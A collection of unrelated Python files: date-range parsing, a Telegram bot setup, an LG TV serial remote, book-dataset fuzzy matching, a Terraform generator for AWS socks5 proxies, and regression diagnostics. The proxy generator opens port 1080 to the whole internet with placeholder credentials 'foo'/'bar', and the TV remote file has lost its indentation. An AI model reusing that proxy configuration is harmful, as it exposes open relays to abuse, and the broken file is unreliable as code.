                    'end': int(next_datetime(dt.year, dt.month).strftime('%s')),
                })
                dt = dt + relativedelta(months=1)
        elif by == 'year':
            # Same scheme, but stepping a calendar year at a time.
            dt = datetime.datetime.utcfromtimestamp(date['start'])
            dt = dt.replace(month=1, day=1, hour=0, minute=0, second=0, microsecond=0)
            while int(dt.strftime('%s')) < date['end']:
                d.append({
                    'name': dt.strftime('%Y'),
                    'start': int(dt.strftime('%s')),
                    'end': int(next_datetime(dt.year).strftime('%s')),
                })
                dt = dt + relativedelta(years=1)
        else:
            d.append(date)
    return d
# Take a range string of format [START][-[END]], where START and END are
# either integers, or dates of format YYYY[MM[DD[HH[MM[SS]]]]] in UTC.
#
# Return a list of dictionaries bounding the start and end of that range
# (start - inclusive, end - exclusive). If input were dates, return dates
# as seconds since the epoch.
def parse_startend(ranges, type='date'):
    """Parse each range string into a {'name', 'start', 'end'} dict.

    ranges: iterable of "[START][-[END]]" strings (an empty string yields
        the full default range).
    type: 'date' for YYYY[MM[DD...]] bounds in UTC epoch seconds,
        'int' for plain integer bounds (end exclusive, hence the +1).
    """
    d = []
    for range_str in ranges:
        # Defaults: the widest possible range for this type.
        start = 0
        end = max_num
        if type == 'date':
            end = int(datetime.datetime(
                *parse_date(max_date),
                tzinfo=pytz.timezone('UTC'),
            ).strftime('%s'))
        if range_str:
            r = range_def.match(range_str)
            if r:
                if type == 'date':
                    if r.group(1):
                        start_dt = datetime.datetime(
                            *datetime_defaults(*parse_date(r.group(1))),
                            tzinfo=pytz.timezone('UTC'),
                        )
                        start = int(start_dt.strftime('%s'))
                    # End is exclusive: take the "next" unit after the end
                    # date (or after the start date when no end was given).
                    end_dt = next_datetime(
                        *parse_date(r.group(3) or (r.group(2) and max_date) or r.group(1)),
                        tzinfo=pytz.timezone('UTC'),
                    )
                    end = int(end_dt.strftime('%s'))
                elif type == 'int':
                    start = int(r.group(1) or 1)
                    end = int(r.group(3) or (r.group(2) and max_num) or r.group(1)) +1
        d.append({ 'name': range_str, 'start': start, 'end': end })
    return d
# Take a date/time string with optional components of format
# YYYY[MM[DD[HH[MM[SS]]]]] and return that information split into a tuple
# as integers
def parse_date(date):
    """Split a YYYY[MM[DD[HH[MM[SS]]]]] string into a tuple of ints.

    Returns None when the string is empty or does not match.
    (Previously returned a single-use generator despite the comment above
    promising a tuple; now materialised so it can be reused safely.)
    """
    if date:
        r = datetime_def.match(date)
        if r:
            # Convert matched components to integers - omit trailing
            # components we have no information for (unmatched groups
            # are None).
            return tuple(int(e) for e in r.groups() if e is not None)
    return None
# Takes similar arguments as datetime, returns a datetime
# object "1" louder, e.g. if args specify a particular month,
# will return the next month in the same year.
def next_datetime(*date_time, tzinfo=pytz.timezone('UTC')):
    """Return the datetime one unit after the given partial components.

    The unit is determined by how many components were supplied:
    (year,) -> +1 year, (year, month) -> +1 month, ... down to seconds.
    Returns None for zero or more than six components (matching the old
    dict.get() fallback).  The old implementation eagerly built all six
    candidate datetimes just to pick one; this computes only the one needed.
    """
    t1 = datetime.datetime(*datetime_defaults(*date_time), tzinfo=tzinfo)
    n = len(date_time)
    if n == 1:
        return t1 + relativedelta(years=1)
    if n == 2:
        return t1 + relativedelta(months=1)
    if n == 3:
        return t1 + datetime.timedelta(days=1)
    if n == 4:
        return t1 + datetime.timedelta(hours=1)
    if n == 5:
        return t1 + datetime.timedelta(minutes=1)
    if n == 6:
        return t1 + datetime.timedelta(seconds=1)
    return None
# Takes partial datetime components (year, month, ...) and pads out the
# mandatory year/month/day fields with start-of-epoch defaults.
def datetime_defaults(*date_time):
    # datetime() needs at least (year, month, day); append whichever of
    # (1970, 1, 1) are missing.
    return tuple(date_time) + (1970, 1, 1)[len(date_time):]
# Returns input expanded into a list, split
# as comma separate entries
def commasep_list(data):
    """Expand a string or list of strings into a flat list of comma-split items.

    None/empty input yields an empty list.
    (type(data) == type([]) replaced with the idiomatic isinstance check.)
    """
    l = []
    if isinstance(data, list):
        for d in data:
            l.extend(d.split(","))
    elif data:
        l.extend(data.split(","))
    return l
def project_to_parent(project):
    """Map a project name to its parent via the configured regex table.

    Falls back to the project name itself when no pattern matches.
    """
    for entry in project_parent_regex:
        if entry['re'].match(project):
            return entry['parent']
    return project
# Script entry point: run main() only when executed directly,
# not when imported as a module.
# ---------------------------------------
if __name__ == "__main__":
    main()
|
from aiogram import Bot
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.contrib.middlewares.logging import LoggingMiddleware
from aiogram.dispatcher import Dispatcher
from bot import TOKEN

# Shared bot and dispatcher objects for the handler modules.
bot = Bot(token=TOKEN)
# In-memory FSM storage: conversation state is lost on restart.
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
# Route every incoming update through aiogram's logging middleware.
dp.middleware.setup(LoggingMiddleware())
|
"""
#Author: Sean Sill
#email: sms3h2@gmail.com
#Date: 2/2/2013
#Notes:
Created this file to act as a remote control from my pc to my computer!
"""
try:
import serial
print 'Serial Imported'
except:
import testserial as serial
print 'Pyserial not found, using a dummy serial port'
pass
import xml.dom.minidom
import binascii
import threading
import Queue
import string
import time
import sys
class lgtv(object):
inputs = {}
alive = False
comPort = ''
setID = ''
baud = ''
def __init__(self, file='', comPort='COM0', setID='00'):
if(file != ''):
self.__importSettings(file)
if(self.comPort == ''):
self.comPort = comPort
if(self.setID == ''):
self.setID = setID
print 'Found baud: ', self.baud
print 'Found Set ID: ', self.setID
print 'Found COM port: ', self.comPort
print 'Opening serial connection on: ', comPort
self.alive = True
#Open serial port
self.__ser = serial.Serial(self.comPort, timeout=0.5)
self.rxThread = threading.Thread(None, target=self.__rx__)
self.rxThread.start()
self.rxQueue = Queue.Queue()
self.txThread = threading.Thread(None, target=self.__tx__)
self.txThread.start()
self.txQueue = Queue.Queue()
#Current TV state
self.__power = False
self.__volume = '00'
self.__input = '00'
def __del__(self):
print 'lgtv destructor'
self.alive = False
self.txThread.join()
self.rxThread.join()
print 'Threads joined now exiting'
def disconnect(self):
self.__del__()
def __importSettings(self, file):
if self.alive:
raise Exception('Can not try to import settings during runtime!!')
try:
print "Attempting to open file"
dom = xml.dom.minidom.parse(file)
#Now to parse the file
node = dom.getElementsByTagName('tv')[0]
if(node.hasAttribute('COM')):
self.comPort = node.getAttribute('COM')
if(node.hasAttribute('setId')):
self.setId = node.getAttribute('setId')
if(node.hasAttribute('baud')):
self.baud = node.getAttribute('baud')
#for input_node in dom.getElementsByTagName('input'):
#print input_node
#name = input_node.getAttribute('name')
#if(name != ''):
#data = input_node.childNodes[0].data
#self.inputs[name] = data
#for volume_node in node.getElementsByTagName('volume'):
#print volume_node
except:
print sys.exc_info()[0]
print "Invalid Config File"
quit()
print "Imported config file"
return
def __tx__(self):
print 'Starting transmit thread'
while self.alive:
try:
self.__ser.write(self.txQueue.get(True, 1).msg)
except:
pass
return
def __rx__(self):
print 'Starting recieve thread'
while self.alive:
try:
data = self.__ser.read(100)
if data is not '':
print "Data recieved: ", data
except:
print "Couldn't Read"
pass
def power(self, on=True):
if on:
self.__power = True
self.txQueue.put(lgMsg(self.setID, 'ka', '1'), False)
else:
self.__power = False
self.txQueue.put(lgMsg(self.setID, 'ka', '0'), False)
return
def input(self, inputString):
"""
Takes a string and updates the input via the string.
This hasn't been completely updated yet, and really needs a way to load in a
text file that allows you to set the values
"""
if(self.inputs.has_key(inputString)):
self.txQueue.put(lgMsg(self.setID, 'xb', self.inputs[inputString]), False)
class lgMsg(object):
    """
    Class: lgMsg
    Builds one command message for an LG TV.
    Wire format: "<command> <setID> <data>\x0D" (carriage-return terminated).
    """
    def __init__(self, setID='00', command='ka', data='FF'):
        self.__setID = setID
        self.__command = command
        self.__data = data
        self.msg = self.updateMsg()
    def __str__(self):
        return self.msg
    def __repr__(self):
        return self.msg
    def updateMsg(self):
        # Rebuild the wire string from the current fields, cache and return it.
        self.msg = '%s %s %s\x0D' % (self.__command, self.__setID, self.__data)
        return self.msg
if __name__ == '__main__':
    # Minimal Tkinter remote-control window (Python 2 Tkinter/ttk).
    from Tkinter import *
    import ttk
    #Load configuration files
    tv = lgtv('config.xml', 'COM1')
    root = Tk()
    root.title('TV Remote')
    inputButtons = []
    powerButtonOn = ttk.Button(root, text="Power On", command=lambda: tv.power(True))
    powerButtonOff = ttk.Button(root, text="Power Off", command=lambda: tv.power(False))
    # One button per configured TV input; the default argument binds the
    # current key (avoids the late-binding closure pitfall).
    for key in tv.inputs:
        inputButtons.append(ttk.Button(root, text=key, command = lambda x = key: tv.input(x)))
    #Grid the buttons
    powerButtonOn.grid(column=0, row=0)
    powerButtonOff.grid(column=0, row=1)
    for i in range(len(inputButtons)):
        inputButtons[i].grid(column=0, row=(2+i))
    root.mainloop()
    # mainloop() blocks until the window is closed; then stop the serial threads.
    tv.disconnect();
import numpy as np
import pandas as pd
import gzip
import json
import preprocessing as pre
#Read json.gz (gzip)
#Chunk reading needed
def parse(path, lower, limit):
    """Yield JSON records from a slice of a gzipped JSON-lines file.

    path: path to the .json.gz file.
    lower/limit: 1-based line bounds, both inclusive (lines with
        index < lower are skipped; reading stops after line 'limit').
    The file is now opened in a 'with' block so the handle is closed when
    the generator finishes or is discarded (the old code leaked it).
    """
    with gzip.open(path, 'rb') as g:
        for i, line in enumerate(g, start=1):
            if i < lower:
                continue
            if i > limit:
                break
            yield json.loads(line)
def getDF(path, lower, limit):
    """Build a DataFrame from a slice of a gzipped JSON-lines file.

    Rows are indexed 0..n-1 in file order; bounds are passed through to
    parse() (1-based, inclusive).
    """
    records = {index: record for index, record in enumerate(parse(path, lower, limit))}
    return pd.DataFrame.from_dict(records, orient='index')
#No chunk reading needed
def parseSmall(path):
    """Yield every JSON record from a gzipped JSON-lines file.

    The file is now opened in a 'with' block so the handle is closed when
    the generator finishes or is discarded (the old code leaked it).
    """
    with gzip.open(path, 'rb') as g:
        for line in g:
            yield json.loads(line)
def getDFSmall(path):
    """Build a DataFrame from an entire gzipped JSON-lines file.

    Rows are indexed 0..n-1 in file order.
    """
    records = {index: record for index, record in enumerate(parseSmall(path))}
    return pd.DataFrame.from_dict(records, orient='index')
#Transforms big dataset
def transform(df):
    """Derive a numeric author_id from the Goodreads 'authors' list column.

    Takes the first author entry, renders it as a string, and extracts the
    first run of digits from it as a float author_id.  Mutates and returns
    the same DataFrame.  (The old version first sliced chars 13:26 into
    author_id and immediately overwrote it with the regex extract, so the
    slice was dead code and has been removed; the pattern is now a raw
    string to silence the invalid-escape warning.)
    """
    df['author'] = df.authors.str[:1]
    df['author'] = df['author'].astype(str)
    df['author_id'] = df['author'].str.extract(r'(\d+)', expand=False)
    df['author_id'] = df['author_id'].astype(float)
    return df
#Setup external data to fuzzy match to items.csv
#Books1: http://cseweb.ucsd.edu/~jmcauley/datasets.html#social_data
books = pd.read_csv('books.csv', delimiter=',', error_bad_lines=False)
#Books2: https://data.world/divyanshj/users-books-dataset
# NOTE(review): error_bad_lines is deprecated in recent pandas (use
# on_bad_lines='skip'), and the backslashes in these Windows-style paths
# only survive because \B is not a valid escape - confirm before upgrading.
books2 = pd.read_csv('Dataworld\BX-Books.csv', delimiter=';', quotechar='"', encoding = 'unicode_escape',error_bad_lines=False)
books2Rat = pd.read_csv('Dataworld\BX-Book-Ratings.csv', delimiter=';', quotechar='"', encoding = 'unicode_escape',error_bad_lines=False)
#Transformation
# Collapse per-user ratings to one mean rating per ISBN.
books2Rat = books2Rat.drop(columns=['User-ID'])
books2Rat = books2Rat.groupby(['ISBN']).mean()
books2Rat = books2Rat.reset_index()
#Merge with ratings
books2 = books2.merge(books2Rat, how='left', on='ISBN')
#Adapt scale to other datasets (max = 5)
# Min-max rescale of Book-Rating onto [scaleMin, scaleMax] = [0, 5].
scaleMin = 0
scaleMax = 5
books2['Book-Rating'] = (scaleMax-scaleMin) * ((books2['Book-Rating']-min(books2['Book-Rating']))/(max(books2['Book-Rating'])-min(books2['Book-Rating']))) + scaleMin
#Other transformation
# Normalise Year-Of-Publication to a digits-only string, '0' when missing.
books2['Year-Of-Publication'] = books2['Year-Of-Publication'].str.strip()
books2['Year-Of-Publication'] = books2['Year-Of-Publication'].replace('[^0-9]+', np.nan, regex=True)
books2['Year-Of-Publication'] = books2['Year-Of-Publication'].str.strip()
books2['Year-Of-Publication'] = books2['Year-Of-Publication'].replace(' ', '', regex=True)
books2['Year-Of-Publication']= books2['Year-Of-Publication'] .fillna('0')
#Put in 1.1.xxxx as publication_date (only year was given for this dataset)
books2['Year-Of-Publication'] = "1/1/" + books2['Year-Of-Publication']
# Align column names with the Books1 dataset before appending.
books2.rename(columns={'Book-Title': 'title', 'Book-Author': 'authors', 'Publisher': 'publisher', 'ISBN': 'isbn',
                       'Year-Of-Publication': 'publication_date', 'Book-Rating': 'average_rating'}, inplace=True)
#Decided to append all (instead of joining), even if some isbn might be duplicates, because other way of writing title/author, other publisher etc.
#Merge books and books2
booksMerge = books2.append(books)
booksMerge = booksMerge.rename(columns = {' num_pages': 'num_pages'})
import gc
# Drop the large intermediate frames before loading the next (bigger)
# dataset, to keep peak memory down.
del books
del books2
del books2Rat
gc.collect()
#Books3: https://sites.google.com/eng.ucsd.edu/ucsdbookgraph/home
#Wasn't able to load the file all in once, so did chunks instead, but wasn't able to load all at once. So I don't know how many missing authors can be found
#Needs to be uncommented to load all parts
# Load the Goodreads dump in 300k-line chunks to bound peak memory, freeing
# each chunk after it has been concatenated.  (This replaces eight
# copy-pasted load/transform/concat stanzas with one loop using exactly the
# same line bounds: (0, 300000), (300001, 600000), ..., (2100001, 2400000).)
_BOOKS3_PATH = 'Good Reads\Books\goodreads_books.json.gz'
_CHUNK = 300000
books3 = None
for _start in range(0, 2400000, _CHUNK):
    # getDF bounds are 1-based inclusive; the very first chunk used 0.
    _lower = _start + 1 if _start else 0
    _part = transform(getDF(_BOOKS3_PATH, _lower, _start + _CHUNK))
    books3 = _part if books3 is None else pd.concat([books3, _part])
    del _part
    gc.collect()
#Author info for dataset
books3Authors = getDFSmall('Good Reads\Books\goodreads_book_authors.json.gz')
#Transformation
# Keep only the id->name mapping and attach the author name to each book.
books3Authors = books3Authors[['author_id', 'name']]
books3Authors.author_id = books3Authors.author_id.astype(float)
books3 = books3.merge(books3Authors, how = 'left', on = 'author_id')
books3 = books3.rename(columns = {'authors': 'authors_list'})
books3 = books3.rename(columns = {'name': 'authors'})
# Drop helper columns whose names start with 'count (#', 'name (#', etc. -
# presumably generated when the authors list was flattened upstream; verify.
books3ToDrop = list(filter(lambda value: value.startswith(r'count (#' ) or value.startswith(r'name (#' ) or value.startswith(r'author_id (#' ) or value.startswith(r'role (#' ), list(books3.columns)))
books3 = books3.drop(columns = books3ToDrop)
books3 = books3.rename(columns = {'image_url': 'Image-URL-S', 'name': 'name_2'})
# Assemble an m/d/y publication_date string to match the other datasets.
books3['publication_date'] = books3.publication_month.astype(str) + r'/' + books3.publication_day.astype(str) + r'/' + books3.publication_year.astype(str)
books3 = books3.drop(columns = ['publication_day', 'publication_month', 'publication_year', 'author'])
#Append to other 2 datasets
booksMerge = booksMerge.append(books3)
del books3
del books3Authors
gc.collect()
#Fuzzy Script adapted from TowardsDataScience from https://drive.google.com/file/d/1Z4-cEabpx7HM1pOi49Mdwv7WBOBhn2cl/view
## load libraries and set-up:
# NOTE(review): -1 for max_colwidth is deprecated in newer pandas (use None).
pd.set_option('display.max_colwidth', -1)
import re
#pip install ftfy # text cleaning for decode issues..
from ftfy import fix_text
from sklearn.feature_extraction.text import TfidfVectorizer
#!pip install nmslib
import nmslib
'''
The below script creates a cleaning function and turns both the master data (the 'clean' data) and the items to be matched against into vectors for matching.
df This is our 'clean' list of company names
df_CF This is the messy raw data that we want to join to the clean list
output1 tf_idf_matrix produced from clean data
output2 messy_tf_idf_matrix produced from the raw data
'''
# 'Clean' side of the match: the merged external book datasets.
df = booksMerge
input1_column = 'title'
#Uses preprocessing script of Haowen
# 'Messy' side of the match: the project's own items.csv after preprocessing.
df_CF = pre.preprocessing('../items.csv', 'transactions.csv', False)[0]
input2_column = 'title'
del booksMerge
gc.collect()
#transforms company names with assumptions taken from: http://www.legislation.gov.uk/uksi/2015/17/regulation/2/made
def ngrams(string, n=3):
    """Clean an input string and return its character n-grams.

    The cleaning pipeline (lower-casing, ftfy repair, ASCII stripping,
    punctuation removal, '&' -> 'and', title-casing, whitespace collapse)
    is aimed at UK company names but works for arbitrary text.
    """
    text = fix_text(str(string).lower())
    text = text.encode("ascii", errors="ignore").decode()  # drop non-ASCII chars
    # Strip punctuation and brackets in a single regex pass.
    punctuation = ")(.|[]{}'-"
    text = re.sub('[' + re.escape(punctuation) + ']', '', text)
    text = text.replace('&', 'and')
    text = text.title()  # capital at the start of each word
    text = re.sub(' +', ' ', text).strip()  # collapse runs of spaces
    text = ' ' + text + ' '  # pad so edge characters appear in full n-grams
    return [''.join(gram) for gram in zip(*[text[i:] for i in range(n)])]
#See how n-grams works
# print('All 3-grams in "Department":')
# print(ngrams('Depar-tment &, Ltd'))
###FIRST TIME RUN - used to build the matching table
##### Create a list of items to match here:
org_names = list(df[input1_column].unique()) #unique org names from company watch file
#Building the TFIDF off the clean dataset - takes about 5 min
vectorizer = TfidfVectorizer(min_df=1, analyzer=ngrams)
tf_idf_matrix = vectorizer.fit_transform(org_names)
##### Create a list of messy items to match here:
# file containing messy supplier names to match against
messy_names = list(df_CF[input2_column].unique()) #unique list of names
#Creation of vectors for the messy names
messy_tf_idf_matrix = vectorizer.transform(messy_names)
'''
Matching
This script takes the two sets of vectors and matches them to each other. It uses the NMSLIB library https://github.com/nmslib/nmslib as this is the fastest python library avaliable for this matching
Input1 - 'tf_idf_matrix' created from scripts above from the Company Watch bulk data
Input2 - 'messy_tf_idf_matrix' created from the scripts above (from the data set to match against. eg Contracts Finder)
Output - 'nbrs' which contains the index matches across the two inputs alongside a confidence score (lower is better)
'''
# create a random matrix to index
data_matrix = tf_idf_matrix#[0:1000000]
# Set index parameters
# These are the most important ones
# NOTE(review): M and efC are HNSW tuning knobs; the simple_invindx method chosen below does not read them.
M = 80
efC = 1000
num_threads = 4 # adjust for the number of threads
# Intitialize the library, specify the space, the type of the vector and add data points
index = nmslib.init(method='simple_invindx', space='negdotprod_sparse_fast', data_type=nmslib.DataType.SPARSE_VECTOR)
index.addDataPointBatch(data_matrix)
# Create an index
index.createIndex()
#K-Nearest Neighbour
# Number of neighbors
num_threads = 4
K=1
query_matrix = messy_tf_idf_matrix
query_qty = query_matrix.shape[0]
nbrs = index.knnQueryBatch(query_matrix, k = K, num_threads = num_threads)
'''Script for joining matches back to the data set'''
# For every messy name keep its best clean-name match plus the (negative) similarity score.
mts =[]
for i in range(len(nbrs)):
    origional_nm = messy_names[i]
    try:
        matched_nm = org_names[nbrs[i][0][0]]
        conf = nbrs[i][1][0]
    except:
        matched_nm = "no match found"
        conf = None
    mts.append([origional_nm,matched_nm,conf])
mts = pd.DataFrame(mts,columns=['title','title_match','conf'])
results = df_CF.merge(mts,how='left',on='title')
del df_CF
del org_names
del messy_names
del mts
del nbrs
gc.collect()
results.conf.hist()
#Profile of matches - lower is higher confidence
###Last step of algorithm
#Further Transformation
#Only take certain confidence
# Scores are negative dot products, so "worse than threshold" means closer to zero (conf > -0.7).
confTreshold = -0.7
results.title_match[results.conf > confTreshold] = np.nan
results = results.drop_duplicates()
#Match with other columns
#Afterwards there will be some duplicates item-wise, but it is because booksMerge has listet the same book
#(same title) with different isbn etc. (like it is in items, too) > Keep for now, decide later what to do
results = results.merge(df, how = 'left', left_on = 'title_match', right_on = "title", suffixes = ('', '_y'))
del df
gc.collect()
results = results.drop(columns=['title_y'])
#######Do second checky by fuzzy matching authors: Fuzzy Match Row by Row
from fuzzywuzzy import fuzz
results['author'] = results['author'].astype(str)
results['authors'] = results['authors'].astype(str)
results['confAuthor'] = results.apply(lambda x : fuzz.ratio(x.author, x.authors),axis=1)
confAuthorsThreshold = 50
# Low author similarity invalidates the joined metadata: reset the joined columns to sentinels.
results.authors[(results.confAuthor < confAuthorsThreshold) & (results.author != 'Unknown')] = 'Unknown'
results.isbn[(results.confAuthor < confAuthorsThreshold) & (results.author != 'Unknown')] = 0
results.average_rating[(results.confAuthor < confAuthorsThreshold) & (results.author != 'Unknown')] = -1
results.authors[results.authors == 'nan'] = 'Unknown'
results.authors[results.authors == 'NaN'] = 'Unknown'
#True: There is additional data available that can be used! False: Don't use joined data (conf too low)
results['AdditionalData'] = np.where((results['authors'] == 'Unknown') & (results['isbn'] == 0) & (results['average_rating'] == -1), False, True)
results = results.drop(columns = ['asin', 'format', 'is_ebook', 'kindle_asin', 'edition_information', 'author_id', 'work_id', 'book_id'])
missingValuesAuthorBefore = results[results['author'] == 'Unknown'].iloc[:,0:6].drop_duplicates().shape[0]
#Missing authors are filled in
results.author[(results['author'] == 'Unknown') & (results['authors'] != 'Unknown')] = results['authors']
#Could find?
columns = list(results[results['author'] == 'Unknown'].iloc[:,0:6].columns)
columns.append('authors')
missingValuesAuthorNow = results[(results['author'] == 'Unknown') & (results.authors == 'Unknown')][columns].drop_duplicates().shape[0]
#Was able to find:
print('Was able to find: ' + str(missingValuesAuthorBefore - missingValuesAuthorNow))
results.title_match.isnull().sum()
|
#!/usr/bin/env python3
from string import Template
user_data = '''Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- rightscale_userdata
- scripts-per-once
- scripts-per-boot
- scripts-per-instance
- [scripts-user, always]
- keys-to-console
- phone-home
- final-message
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
sudo yum install -y docker
sudo usermod -a -G docker ec2-user
sudo curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` | sudo tee /usr/local/bin/docker-compose > /dev/null
sudo chmod +x /usr/local/bin/docker-compose
sudo service docker start
sudo chkconfig docker on
sudo cat <<EOF > /etc/docker-compose.yml
version: "3.3"
services:
proxy:
image: xkuma/socks5:latest
ports:
- "1080:1080"
environment:
- "PROXY_USER=foo"
- "PROXY_PASSWORD=bar"
- "PROXY_SERVER=0.0.0.0:1080"
EOF
sudo /usr/local/bin/docker-compose -f /etc/docker-compose.yml up -d
--// '''
region_tmpl = Template("""# --- aws resources for region $region ---
provider "aws" {
region = "$region"
alias = "$region"
}
resource "aws_security_group" "sg_$region" {
provider = "aws.$region"
name = "$project-$region-sg"
description = "Allow incoming socks5 proxy traffic"
ingress {
from_port = 1080
to_port = 1080
protocol = "tcp"
cidr_blocks = ["0.0.0.0/0"]
}
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
}
resource "aws_instance" "ec2_$region" {
provider = "aws.$region"
count = "$${var.counts["$region"]}"
ami = "$ami"
instance_type="t2.nano"
associate_public_ip_address = true
vpc_security_group_ids=["$${aws_security_group.sg_$region.id}"]
user_data="$${var.user_data}"
tags {
Name = "newslister.$region"
Project = "newslister"
}
}""")
region_to_amis = {
'ap-northeast-1': 'ami-0cf78ae724f63bac0',
'ap-northeast-2': 'ami-08cfa02141f9e9bee',
'ap-south-1': 'ami-0aba92643213491b9',
'ap-southeast-1': 'ami-0cf24653bcf894797',
'ap-southeast-2': 'ami-00c1445796bc0a29f',
'ca-central-1': 'ami-b61b96d2',
'eu-central-1': 'ami-06465d49ba60cf770',
'eu-west-1': 'ami-0ea87e2bfa81ca08a',
'eu-west-2': 'ami-e6768381',
'eu-west-3': 'ami-0050bb60cea70c5b3',
'sa-east-1': 'ami-09c013530239687aa',
'us-east-1': 'ami-0422d936d535c63b1',
'us-east-2': 'ami-0f9c61b5a562a16af',
'us-west-2': 'ami-40d1f038',
'us-west-1': 'ami-0d4027d2cdbca669d',
}
var_tmpl = '''variable "counts" {
type = "map"
default = {'''
def generate_main():
    """Print one rendered per-region Terraform resource block for every known region."""
    for region_name, ami_id in region_to_amis.items():
        mapping = {'project': 'newslister', 'region': region_name, 'ami': ami_id}
        print(region_tmpl.substitute(mapping))
def generate_variables():
    """Print the Terraform "counts" map (one zeroed entry per region) and the shared user_data variable."""
    pieces = [var_tmpl]
    pieces.extend(f'"{name}" = "0"\n' for name in region_to_amis)
    counts_block = ''.join(pieces) + '}\n}'
    print(counts_block)
    print(f'''variable "user_data" {{
default = <<IN
{user_data}
IN
}}''')
# Emit the complete Terraform configuration (per-region resources, then variables) to stdout.
if __name__ == '__main__':
    generate_main()
    generate_variables()
|
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
from sklearn.metrics import mean_squared_log_error, mean_squared_error, make_scorer, r2_score
from sklearn.utils import resample
from sklearn.preprocessing import StandardScaler
import scipy.stats as stats
from statsmodels.stats.diagnostic import het_breuschpagan
def create_predictions(fitted_logYmodel, data_fe, y):
    """
    returns a dataframe pairing actual values with back-transformed predictions of a log-target model
    arguments
    ---------
    fitted_logYmodel: linear regression model fitted on log(y)
    data_fe: prepared features for prediction
    y: target variable
    return
    ------
    dataframe with columns 'truth' and 'pred'
    """
    # Predictions come back on the log scale, so exponentiate to recover counts.
    preds = pd.Series(np.exp(fitted_logYmodel.predict(data_fe)))
    frame = pd.concat([pd.Series(data_fe.index), preds], axis=1)
    frame.columns = ['datetime', 'count']
    frame = frame.set_index('datetime')
    combined = pd.concat([y, frame], axis=1)
    combined.columns = ['truth', 'pred']
    return combined
def create_predictions_simplelr(fitted_model, data_fe, y):
    """
    returns a dataframe pairing actual values with predictions of a plain (non-log) model
    arguments
    ---------
    fitted_model: linear regression model of y vs. x
    data_fe: prepared features for prediction
    y: target variable
    return
    ------
    dataframe with columns 'truth' and 'pred'
    """
    preds = pd.Series(fitted_model.predict(data_fe))
    frame = pd.concat([pd.Series(data_fe.index), preds], axis=1)
    frame.columns = ['datetime', 'count']
    frame = frame.set_index('datetime')
    combined = pd.concat([y, frame], axis=1)
    combined.columns = ['truth', 'pred']
    return combined
def plot_diagnostics_timescales(df):
    """
    plots multi-panel time series of predictions and actuals on different timescales
    arguments
    ---------
    df: dataframe of truth and prediction columns labeled "truth" and "pred"
    return
    ------
    2 figures
    """
    # Figure 1: long-horizon views — seasonal trend plus one December week.
    fig1, ax1 = plt.subplots(2, 1, figsize=(6.4*2.5, 4.8*2.2))
    # 24 h * 30 d rolling window smooths hourly counts to a monthly trend line.
    ax1[0].plot(df['truth'].rolling(window=24 * 30).mean(), label='Actual', linewidth=3)
    ax1[0].plot(df['pred'].rolling(window=24 * 30).mean(), label='Predicted', linewidth=3)
    ax1[0].legend(loc = 'upper left')
    ax1[0].set_title("Seasonality with 30-Day-Smoothing", fontweight = "bold")#, size=24, fontweight="bold")
    ax1[0].set_ylabel("Bike Rental Count")#, fontsize=20, fontweight="bold")
    ax1[1].plot(df.loc['2012-12-01':'2012-12-08'], linewidth=3)
    ax1[1].set_title("Weekly cycle", fontweight = "bold")#, fontsize=24, fontweight="bold")
    ax1[1].set_ylabel("Bike Rental Count")#, fontsize=20, fontweight="bold")
    # Figure 2: four single days in December 2012 to contrast weekday vs. weekend shapes.
    fig2, ax2 = plt.subplots(2, 2, figsize=(6.4*2.5, 4.8*2.2), sharey=True)
    ax2[0, 0].plot(df['truth'].loc['2012-12-17'], label='Actual', linewidth=3)
    ax2[0, 0].plot(df['pred'].loc['2012-12-17'], label='Predicted', linewidth=3)
    ax2[0, 0].set_title("Monday", fontweight = "bold")
    ax2[0, 0].set_ylabel("Bike Rental Count")
    ax2[0, 0].legend(loc = 'upper left')
    ax2[0, 1].plot(df.loc['2012-12-19'], linewidth=3)
    ax2[0, 1].set_title("Wednesday", fontweight = "bold")
    ax2[1, 0].plot(df.loc['2012-12-15'], linewidth=3)
    ax2[1, 0].set_title("Saturday",fontweight = "bold")
    ax2[1, 0].set_ylabel("Bike Rental Count")
    ax2[1, 1].plot(df.loc['2012-12-16'], linewidth=3)
    ax2[1, 1].set_title("Sunday",fontweight = "bold")
    # Rotate the hourly tick labels so they do not overlap.
    plt.setp(ax2[0,0].get_xticklabels(), rotation=20, ha='right')
    plt.setp(ax2[0,1].get_xticklabels(), rotation=20, ha='right')
    plt.setp(ax2[1,0].get_xticklabels(), rotation=20, ha='right')
    plt.setp(ax2[1,1].get_xticklabels(), rotation=20, ha='right')
    return fig1, fig2
def check_lr_assumptions(df, data_fe):
    """
    prints multiple statistical tests and returns a dataframe containing residuals
    arguments
    ---------
    df: dataframe of truth and prediction columns labeled "truth" and "pred"
    data_fe: prepared features for prediction
    return
    ------
    dataframe
    """
    # NOTE: mutates the caller's frame in place by adding a 'residuals' column.
    df['residuals'] = df['pred'] - df['truth']
    # A well-specified OLS fit should show ~zero-mean residuals with no heavy
    # skew/kurtosis and should pass the normality tests below.
    print("mean of residuals:", df['residuals'].mean())
    print("variance of residuals:", df['residuals'].var())
    print("skewness of residuals:", stats.skew(df.residuals))
    print("kurtosis of residuals:", stats.kurtosis(df.residuals))
    print("kurtosis test of residuals:", stats.kurtosistest(df.residuals))
    print("normal test of residuals (scipy stats):", stats.normaltest(df.residuals))
    print("Jarque Bera test for normality of residuals:", stats.jarque_bera(df.residuals))
    # Breusch-Pagan regresses squared residuals on the features to detect heteroscedasticity.
    print("Breusch Pagan test for heteroscedasticity:", het_breuschpagan(df.residuals, data_fe))
    return df
def plot_residuals_hist(df):
    """
    plots histogram of residuals
    arguments
    ---------
    df: dataframe of truth and prediction columns labeled "truth" and "pred"
    return
    ------
    none
    """
    # NOTE: adds/overwrites the 'residuals' column on the caller's frame in place.
